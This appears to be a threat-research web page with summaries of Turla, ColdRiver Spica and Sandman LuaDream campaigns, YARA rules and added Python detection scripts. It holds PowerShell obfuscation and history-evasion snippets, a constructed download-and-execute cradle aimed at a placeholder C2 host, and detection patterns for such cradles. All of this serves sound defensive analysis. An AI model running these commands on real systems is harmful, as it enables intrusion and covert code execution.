Infostealer


AgentTesla's Deceptive Tactics: Analyzing CHM Extension Distribution

Explore the stealthy tactics of AgentTesla, distributed via deceptive CHM files in emails, posing as order-related attachments

17-Jan-2024
4 min read

Related Articles


Turla

APT

Uncover the latest tactics of Russia's Turla APT. This technical report analyze...

Turla, a Russian state-sponsored Advanced Persistent Threat (APT) group, conducts sophisticated cyberespionage against government institutions, NGOs, and organizations of interest to the Russian state. This [Threat Research](https://www.secureblink.com/threat-research) provides a detailed analysis of Turla's historical context, its recent operations ("Turla Wields" below), and a technical analysis of its tools and techniques.

### Origins and Historical Context

Turla, also known as Snake, Uroburos, Waterbug, and Venomous Bear, emerged in the late 1990s, targeting governments and militaries globally. Its operations align with Russia's geopolitical interests, focusing on nations bordering Russia and former Soviet states. Turla is adept at evading detection and prefers long-term intelligence gathering over disruptive attacks.

### Turla Wields: Recent Attack Trends and Targeting

Recent campaigns target NGOs, particularly those supporting Ukrainian causes. Turla piggybacks on legacy infections such as the Andromeda botnet, uses spear-phishing with weaponized PDFs, and constantly evolves its toolkit, most recently with TinyTurla-NG and TurlaPower-NG. Motives range from military intelligence gathering to destabilizing opposition parties and supporting hybrid warfare.

### Technical Analysis of Turla Techniques

Turla's initial infection vectors include spear-phishing, zero-day vulnerabilities, and compromised websites. It establishes persistence with TinyTurla-NG, which relies on DLL loading and file masquerading. Command-and-control (C2) traffic is disguised as ordinary web traffic, with redundant C2 servers for resilience.

### Data Exfiltration Techniques

Turla uses custom tools such as TurlaPower-NG to target password-manager databases and browser history databases. Exfiltration involves archiving files and uploading them in stages, which spreads the activity out over time and makes it harder to spot.

### "Living off the Land" Approach

Turla increasingly relies on PowerShell, using obfuscation and disabling command-history recording to evade detection.

### Countermeasures and Defense Considerations

Patching vulnerabilities, especially zero-days, is crucial. Endpoint Detection and Response (EDR) platforms with behavioral baselining and anomaly detection can spot Turla's subtle activity. Application and script allow-listing, together with security awareness training, strengthen defenses. Web infrastructure hardening and intrusion detection systems are also recommended.

## Technical Analysis: Evolving Toolset Breakdown

### TinyTurla-NG and TurlaPower-NG Deep Dive

#### TinyTurla-NG

- Network protocols: HTTP/HTTPS with custom headers and unusual User-Agent strings.
- C2 commands: task-scheduling logic and data encoding for exfiltration.
- Persistence: registry hiding, DLL hijacking, and boot-time execution.

#### TurlaPower-NG

- Target files: password-manager databases and browser history SQLite databases.
- Data extraction logic: parsing methods and obfuscation techniques.
- Archiving: compression and encryption of files before upload.

### Obfuscation and Anti-Forensics

Turla uses meaningless variable names, packed executables, and sandbox-evasion techniques to hinder analysis. It leaves minimal forensic traces by cleaning up temporary files and overwriting on-disk artifacts.

### Historical Malware Progression

Turla's tools have evolved from compiled executables to PowerShell-based tooling that leverages trusted Windows programs for stealth and adaptability. Staged exfiltration and variable beaconing intervals remain consistent features across toolsets.

## Victim Profiling & Targeting Patterns

### Target Industries & Organizations

Turla targets a range of industries, including defense, technology, government, diplomacy, and NGOs. Specific organizations and job titles vary, with a focus on technical staff for network compromise and decision-makers for policy insight.

### Geographic Shifts & Geopolitical Correlation

Turla's targeting intensifies around geopolitical events involving Russia, such as elections and conflicts. Analysis reveals patterns of intelligence gathering preceding significant actions, indicating strategic alignment with Russian interests.

## Code Snippets for Detection

The following are representative indicators based on open-source reporting on TinyTurla-NG and similar C2 mechanisms Turla often uses. Use them with caution: APTs evolve, so these patterns may change in future samples.

#### Registry Modification (Possible Turla DLL Loading)

```
HKEY_CURRENT_USER\Software\Classes\CLSID\{<unusual-looking-GUID>}
```

Suspicious values under this key can point to persistence via COM object loading.

#### Unusual HTTP Beaconing Traffic Patterns

A simplified YARA rule for traffic to compromised WordPress sites used as C2:

```yara
rule turla_wp_beacon {
    meta:
        description = "Possible Turla compromise of WordPress sites for C2"
        author = "<Your Org Name>"
        date = "2024-02-27"
    strings:
        // text string: a YARA hex string ({ ... }) only accepts hex bytes
        $http_header = "Content-Type: multipart/form-data;" ascii nocase
        $beacon_id = /page=[0-9]{8}/
    condition:
        all of them
}
```

#### PowerShell Obfuscation Techniques (Simplified Examples)

```powershell
# Base64 encoding to conceal the real command from casual inspection
$encoded = '<base64 encoded command>'   # placeholder
$cmd = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))
Invoke-Expression $cmd                  # usually seen under its alias, iex

# Modifying command execution flow: reassemble a hidden string from reordered characters
$var = 'Something'
$var[3..1] -join ''                     # indexes the string as a char array, then rejoins

# PowerShell history evasion: PSReadLine never writes ConsoleHost_history.txt
Set-PSReadLineOption -HistorySaveStyle SaveNothing
```

## Conclusion

Turla's persistence and adaptability make it a formidable threat to global security. Understanding its techniques and motivations is crucial for developing effective defense strategies. By implementing rigorous countermeasures and leveraging threat intelligence, organizations can mitigate the risk posed by Turla's cyberespionage activities.
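The PowerShell techniques listed above are easier to catch in logs than on the command line, because ScriptBlock logging (Event ID 4104) records the text PowerShell actually ran. The following is an added example, not code from the original article or from any Turla tooling: it runs over a few constructed ScriptBlock texts, decodes the UTF-16LE base64 that `-EncodedCommand` carries, and flags download cradles run through `iex`, PSReadLine history suppression, and character-reordering tricks. The sample commands, the C2 URL and the indicator names are all constructed for this example.

```python
import base64
import binascii
import re

# Indicator patterns for the techniques in the article: encoded commands, download
# cradles fed to Invoke-Expression, PSReadLine history suppression, char reordering.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
INVOKE_EXPR = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I)
HISTORY_EVASION = re.compile(r"HistorySaveStyle\s+SaveNothing|ConsoleHost_history", re.I)
STRING_REORDER = re.compile(r"\[\s*-?\d+\s*\.\.\s*-?\d+\s*\]\s*-join", re.I)


def decode_encoded_command(b64: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not that."""
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def encode_ps(command: str) -> str:
    """Inverse of decode_encoded_command; used here only to build the constructed samples."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def analyze_script_block(block: str) -> dict:
    """Return the indicators that fire on one logged script block, plus any decoded payload."""
    indicators = []
    decoded = None
    match = ENCODED_CMD.search(block)
    if match:
        indicators.append("encoded_command")
        decoded = decode_encoded_command(match.group(1))
    # Check both the visible text and whatever the base64 layer concealed.
    text = block if decoded is None else block + "\n" + decoded
    if INVOKE_EXPR.search(text) and DOWNLOAD_CRADLE.search(text):
        indicators.append("download_cradle")
    if HISTORY_EVASION.search(text):
        indicators.append("history_evasion")
    if STRING_REORDER.search(text):
        indicators.append("string_reordering")
    return {"block": block, "decoded": decoded, "indicators": indicators}


def triage(blocks):
    """Keep only the script blocks that tripped at least one indicator."""
    return [r for r in map(analyze_script_block, blocks) if r["indicators"]]


# Constructed sample ScriptBlock texts (Event ID 4104 style); the C2 URL is a placeholder.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents",
    "powershell.exe -nop -w hidden -enc "
    + encode_ps("iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/p')"),
    "$var = 'Something'; $var[3..1] -join ''",
    "Set-PSReadLineOption -HistorySaveStyle SaveNothing",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_SCRIPT_BLOCKS):
        print(hit["indicators"], "<-", hit["block"][:60])
        if hit["decoded"]:
            print("    decoded:", hit["decoded"])
```

The decode step matters more than the regexes: an `-EncodedCommand` payload that is never decoded hides every other indicator, so the check is run on the visible text and the decoded text together. Tune the patterns to your environment; `-w hidden` and `-nop` alone are common in legitimate automation.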

21-Feb-2024
1 min read

APT

Phishing

Explore ColdRiver's Spica malware in this detailed threat analysis. Uncover Russ...

ColdRiver, a Russia-backed advanced persistent threat (APT) group, has extended its cyber-espionage tradecraft with a custom backdoor named "Spica", a substantial departure from its long-running credential-phishing operations. Google's Threat Analysis Group (TAG) has tracked ColdRiver's activity and documented its evolving techniques. This [Threat Research](https://www.secureblink.com/threat-research) extends that analysis, dissecting the Spica malware, the threat landscape around it, and potential countermeasures.

## Contextual Background

ColdRiver, also known as Blue Charlie, Callisto, Star Blizzard, or UNC4057, primarily targets high-profile individuals in NGOs, former intelligence and military officials, and NATO governments. Historically focused on credential phishing, the group has now extended its capabilities to malware delivery, using PDFs as lure documents.

## Evolution of Tactics

The move from phishing to malware delivery is a strategic transition [observed](https://blog.google/threat-analysis-group/google-tag-coldriver-russian-phishing-malware/) by TAG. ColdRiver uses impersonation accounts, posing as experts or individuals affiliated with the target, to build trust. In the recently observed chain, a benign-looking PDF presented as an op-ed or article is sent to the target, and its text appears encrypted. When the target replies that they cannot read it, the attacker sends a link to a "decryption" utility, which is the Spica backdoor.

## Spica Malware Analysis

### Infiltration and Execution

Spica is written in Rust and uses JSON over WebSockets for command and control (C2). On execution, it decodes an embedded PDF and opens it as a decoy for the user while, in the background, it establishes persistence and connects to the C2 server. Persistence is achieved with an obfuscated PowerShell command that creates a scheduled task named "CalendarChecker".

### Functional Capabilities

Spica is a versatile backdoor: it executes arbitrary shell commands, steals cookies from several browsers, uploads and downloads files, browses the filesystem, and enumerates documents for exfiltration. The presence of multiple variants suggests continuing development of the backdoor.

### Timeline

TAG first observed Spica in September 2023 but assesses that ColdRiver's use of the backdoor dates back to at least November 2022. The sample TAG analyzed, "Proton-decrypter.exe", was likely in use around August and September 2023. TAG notes that multiple Spica versions probably exist, each with a distinct embedded decoy document.

## Implications and Targets

ColdRiver's shift signals a desire for broader capabilities, allowing operations beyond conventional phishing. Targets include Ukraine, NATO countries, academic institutions, and NGOs. While specific victim profiles remain undisclosed, TAG emphasizes the limited, targeted use of Spica, consistent with ColdRiver's established tradecraft.

## Defensive Measures

TAG emphasizes proactive security measures. All identified domains, websites, and files associated with the threat are added to Safe Browsing blocklists. Gmail and Workspace users targeted by government-backed attackers receive alerts, encouraging them to enable Enhanced Safe Browsing for Chrome and keep their devices updated.

## Code and Technical Insights

### Spica Backdoor YARA Rule

TAG published a YARA rule for detecting the Spica backdoor, built on strings and Rust source-path artifacts left in the binary. The rule is reproduced below:

```yara
rule SPICA__Strings {
    meta:
        author = "Google TAG"
        description = "Rust backdoor using websockets for C2 and embedded decoy PDF"
        hash = "37c52481711631a5c73a6341bd8bea302ad57f02199db7624b580058547fb5a9"
    strings:
        $s1 = "os_win.c:%d: (%lu) %s(%s) - %s"
        $s2 = "winWrite1"
        $s3 = "winWrite2"
        $s4 = "DNS resolution panicked"
        $s5 = "struct Dox"
        $s6 = "struct Telegram"
        $s8 = "struct Download"
        $s9 = "spica"
        $s10 = "Failed to open the subkey after setting the value."
        $s11 = "Card Holder: Bull Gayts"
        $s12 = "Card Number: 7/ 3310 0195 4865"
        $s13 = "CVV: 592"
        $s14 = "Card Expired: 03/28"
        $a0 = "agent\\src\\archive.rs"
        $a1 = "agent\\src\\main.rs"
        $a2 = "agent\\src\\utils.rs"
        $a3 = "agent\\src\\command\\dox.rs"
        $a4 = "agent\\src\\command\\shell.rs"
        $a5 = "agent\\src\\command\\telegram.rs"
        $a6 = "agent\\src\\command\\mod.rs"
        $a7 = "agent\\src\\command\\mod.rs"
        $a8 = "agent\\src\\command\\cookie\\mod.rs"
        $a9 = "agent\\src\\command\\cookie\\browser\\mod.rs"
        $a10 = "agent\\src\\command\\cookie\\browser\\browser_name.rs"
    condition:
        7 of ($s*) or 5 of ($a*)
}
```

## Conclusion

ColdRiver's adoption of Spica is a calculated step in the group's evolution. The extended analysis presented here offers a breakdown of its tactics and techniques, Spica's technical characteristics, and recommended defensive measures.
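The YARA rule above finds the binary; the scheduled-task persistence described earlier is a second place to look, and it survives even if the executable is renamed. The following is an added example, not TAG's code and not derived from the Spica sample: it parses Task Scheduler XML (the per-task files under `C:\Windows\System32\Tasks`) and flags tasks whose action launches PowerShell with encoded, hidden-window or policy-bypass switches. "CalendarChecker" is the task name TAG reported; the two task definitions, the trigger details and the base64 payload are constructed placeholders for this example.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (default xmlns in every exported or on-disk task file).
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Matches the basename of the action's Command when it is PowerShell.
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)

# Command-line switches that make a scheduled PowerShell action worth a closer look.
SUSPICIOUS_ARGS = {
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x|xecutionpolicy)\s+(?:bypass|unrestricted)", re.I),
    "download_cradle": re.compile(r"DownloadString|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
}


def assess_task_xml(xml_data) -> dict:
    """Summarize one task definition: name, trigger types, actions, and any flags.

    Pass the raw bytes of a file from C:\\Windows\\System32\\Tasks; those files are
    UTF-16 with a BOM, which the parser handles when given bytes rather than str."""
    root = ET.fromstring(xml_data)
    name = root.findtext("t:RegistrationInfo/t:URI", default="<unnamed>", namespaces=TASK_NS)
    trig_el = root.find("t:Triggers", TASK_NS)
    triggers = [] if trig_el is None else [child.tag.split("}")[-1] for child in trig_el]
    flags, actions = [], []
    for exec_el in root.findall("t:Actions/t:Exec", TASK_NS):
        command = exec_el.findtext("t:Command", default="", namespaces=TASK_NS).strip().strip('"')
        arguments = exec_el.findtext("t:Arguments", default="", namespaces=TASK_NS)
        actions.append(f"{command} {arguments}".strip())
        if POWERSHELL.search(command):
            flags.append("powershell_action")
            flags.extend(label for label, pat in SUSPICIOUS_ARGS.items() if pat.search(arguments))
    return {"task": name, "triggers": triggers, "actions": actions, "flags": flags}


def is_suspicious(assessment: dict) -> bool:
    """PowerShell alone is common in legitimate tasks; require at least one evasion switch too."""
    flags = assessment["flags"]
    return "powershell_action" in flags and len(flags) > 1


def find_suspicious(task_xmls):
    """Assess many task definitions and return only the suspicious ones."""
    return [a for a in map(assess_task_xml, task_xmls) if is_suspicious(a)]


# Constructed task definitions (not captured from a real host).
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T01:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -o</Arguments></Exec>
  </Actions>
</Task>"""

SUSPECT_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\CalendarChecker</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
      <Arguments>-nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA=</Arguments>
    </Exec>
  </Actions>
</Task>"""
# The -enc value above is a constructed placeholder, not a payload from any sample.

if __name__ == "__main__":
    for hit in find_suspicious([BENIGN_TASK, SUSPECT_TASK]):
        print(hit["task"], hit["triggers"], hit["flags"])
```

Run it across every file under the Tasks directory and you get a short list to triage by hand; pair it with Security event 4698 (a scheduled task was created) to catch the moment of registration rather than the aftermath.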

31-Jan-2024
1 min read

APT

Sandman, a mysterious APT group out of unknown origin, strategically targets tel...

Sandman APT has emerged as a mysterious actor targeting telecommunication providers. This [Threat Research](https://www.secureblink.com/threat-research) examines its activity, concentrating on its use of the LuaJIT toolkit and the LuaDream modular backdoor.

### Sandman's Strategic Approach

Sandman, a threat actor of unknown origin, targets telecommunication providers in the Middle East, Western Europe, and South Asia. Its intrusions are characterized by deliberate lateral movement and minimal engagement: the actor does just enough to reach its objectives while staying out of sight.

### LuaJIT Toolkit Adoption

Sandman's novel modular backdoor, LuaDream, stands out for being built on the LuaJIT platform, a rarity in the threat landscape. The implementation reflects a well-executed, actively developed project of considerable scale.

## LuaDream: A Deep Dive

### Architecture and Development Style

LuaDream is a multi-protocol backdoor whose main job is to manage attacker-provided plugins and to exfiltrate system and user information. Its architecture, consisting of 34 components, indicates a project of substantial scale.

#### Code Comment Insight

A code comment in LuaDream's main_proto_WinHttpServer component hints at a possible Chinese origin, adding a layer of complexity to Sandman's attribution:

```lua
-- Code comment (translates from Chinese to "returned handle")
```

### Intricate Staging Process

LuaDream's staging process involves seven main stages conducted entirely in memory, a design focused on evading detection. Anti-analysis measures include thread hiding and sandbox detection.

#### DLL Timestamp Analysis

Analysis of DLL timestamps, while acknowledging that they could have been manipulated, suggests they genuinely fall close to the intrusion date, indicating that the components were built for this operation.

### Sandman's Espionage Motivations

The targeted approach, advanced techniques, and victimology point to espionage. Telecommunication providers, which hold large volumes of sensitive data, are prime targets in this landscape.

### Network Infrastructure Evolution

Sandman's C2 infrastructure moved from ssl.explorecell[.]com to mode.encagil[.]com, an intentional shift to cloud-based reverse-proxy infrastructure that improves the actor's operational security.

## Sandman vs. STORM-0866/Red Dev 40

### Shared Infrastructure Practices

Sandman shares infrastructure control and management practices with the STORM-0866/Red Dev 40 APT cluster, pointing to cooperation and coordination among China-based threat groups.

#### Domain Certificate Overlaps

Analysis reveals SSL certificate overlaps between Sandman's LuaDream C2 domain ssl.explorecell[.]com and STORM-0866/Red Dev 40's dan.det-ploshadka[.]com, highlighting potential collaboration or shared resources.

## LuaDream and KEYPLUG Collaboration

### Shared Development Practices

While LuaDream and KEYPLUG are distinct, they show indicators of shared development practices, including infrastructure control, design overlaps, and functionalities, suggesting a cohesive approach by their operators.

#### Modular Design and Functionality Overlaps

The modular design and overlapping functionality of LuaDream and KEYPLUG further point to shared requirements on the part of the threat actors, and illustrate the evolving nature of the China-based threat landscape.

### Lua-Based APT Landscape Evolution

Historically associated with Western actors, the Lua development paradigm is now embraced by a broader set of cyberespionage threat actors. Sandman's use of LuaDream signifies a shift in development preferences, driven by Lua's modularity, portability, and simplicity.

## Sandman's Targeted Activities

### Victimology and Activities

Sandman's activity, observed primarily in the telecommunication sector, shows a meticulous focus on specific workstations. The actor limits its actions to minimize the risk of detection.

#### Implementation Timeline

Compilation timestamps and artifacts within LuaDream hint at development efforts dating back to 2022, suggesting a persistent actor engaged in espionage over an extended period.

### Infiltration Techniques

Sandman steals administrative credentials and uses pass-the-hash over the NTLM authentication protocol to move laterally. The actor shows strategic patience, waiting for system services to load its malicious components at boot rather than restarting them itself.

#### DLL Hijacking Technique

LuaDream is executed via DLL hijacking: a malicious ualapi.dll, masquerading as a legitimate component, is planted where a system service will load it, so the backdoor runs without a service restart that might draw attention.

### LuaDream Staging Process

The LuaDream staging process runs fully in memory, with multiple steps designed to evade detection. Because LuaJIT compiles the Lua code just in time, the malicious Lua script code is harder to detect on disk or in memory.

### Communication Protocols

LuaDream and KEYPLUG, both highly modular, support HTTP, TCP, WebSocket, and QUIC for C2 communication. The adoption of QUIC and WebSocket together is rare and may reflect shared functional requirements.

## Conclusion

Sandman APT exemplifies the intricate nature of China-based threat clusters. The collaboration with STORM-0866/Red Dev 40, the shared development practices, and the adoption of LuaDream underscore the complexity of, and cooperation within, this threat landscape.

### Ongoing Monitoring

While acknowledging Sandman's association with China-based adversaries, ongoing monitoring is crucial. Sandman is kept as a distinct cluster pending further conclusive information.

#### Broader Lua Development Paradigm Adoption

Sandman's use of LuaDream signals a broader adoption of the Lua development paradigm in cyberespionage. This paradigm, historically Western-aligned, now extends to a diverse set of threat actors for its modularity and simplicity.
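The ualapi.dll hijack described above is visible at the moment the DLL is loaded, and Sysmon Event ID 7 (ImageLoaded) records exactly that: the host process, the DLL path, and whether the DLL carries a valid signature. The following is an added example, not code from the original article or from the Sandman reporting: it runs a hijack check over a few constructed Sysmon-style JSON events. It treats spoolsv.exe as the service host that loads ualapi.dll at start-up (the host named in public reporting on this technique, assumed here), flags any ualapi.dll that is not validly Microsoft-signed, and separately flags any unsigned DLL loaded from System32, since the genuine ualapi.dll present on Windows Server is Microsoft-signed and must not fire. Field names follow Sysmon's Event 7 schema; the event values are constructed.

```python
import json
import ntpath

# Service host documented as loading ualapi.dll from System32 at start-up (assumed here);
# a DLL planted under that name runs inside it with no restart by the attacker.
UALAPI_HOSTS = {"spoolsv.exe"}
MICROSOFT_SIGNERS = {"microsoft windows", "microsoft corporation"}
SYSTEM32 = "c:\\windows\\system32\\"


def check_image_load(event: dict) -> list:
    """Return the reasons a Sysmon Event ID 7 record looks like a DLL hijack (empty if clean)."""
    reasons = []
    host = ntpath.basename(event.get("Image", "")).lower()
    loaded = event.get("ImageLoaded", "")
    dll = ntpath.basename(loaded).lower()
    signed = event.get("Signed", "").lower() == "true"
    microsoft_signed = (
        signed
        and event.get("Signature", "").lower() in MICROSOFT_SIGNERS
        and event.get("SignatureStatus", "").lower() == "valid"
    )
    if dll == "ualapi.dll" and not microsoft_signed:
        reasons.append("ualapi_dll_not_microsoft_signed")
        if host in UALAPI_HOSTS:
            reasons.append("loaded_by_known_hijack_host")
    if loaded.lower().startswith(SYSTEM32) and not signed:
        reasons.append("unsigned_dll_in_system32")
    return reasons


def scan_lines(lines):
    """Parse JSON-per-line Sysmon events and keep those with at least one reason."""
    hits = []
    for line in lines:
        event = json.loads(line)
        reasons = check_image_load(event)
        if reasons:
            hits.append({"event": event, "reasons": reasons})
    return hits


# Constructed sample events in the shape of Sysmon Event ID 7; none of these values
# come from real telemetry.
SAMPLE_SYSMON_LINES = [json.dumps(e) for e in [
    {"EventID": 7, "Image": "C:\\Windows\\System32\\spoolsv.exe",
     "ImageLoaded": "C:\\Windows\\System32\\localspl.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": "C:\\Windows\\System32\\spoolsv.exe",
     "ImageLoaded": "C:\\Windows\\System32\\ualapi.dll",
     "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": "C:\\Windows\\explorer.exe",
     "ImageLoaded": "C:\\Windows\\System32\\shell32.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    # A genuine ualapi.dll exists on Windows Server; its valid Microsoft signature keeps it clean.
    {"EventID": 7, "Image": "C:\\Windows\\System32\\svchost.exe",
     "ImageLoaded": "C:\\Windows\\System32\\ualapi.dll",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_SYSMON_LINES):
        print(hit["reasons"], "<-", hit["event"]["Image"], "loaded", hit["event"]["ImageLoaded"])
```

Because the actor waits for a boot-time service to pick the DLL up, the load event is often the first artifact after the file drop; a file-create event (Sysmon Event ID 11) for `ualapi.dll` under System32 is the matching earlier signal.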

10-Jan-2024
1 min read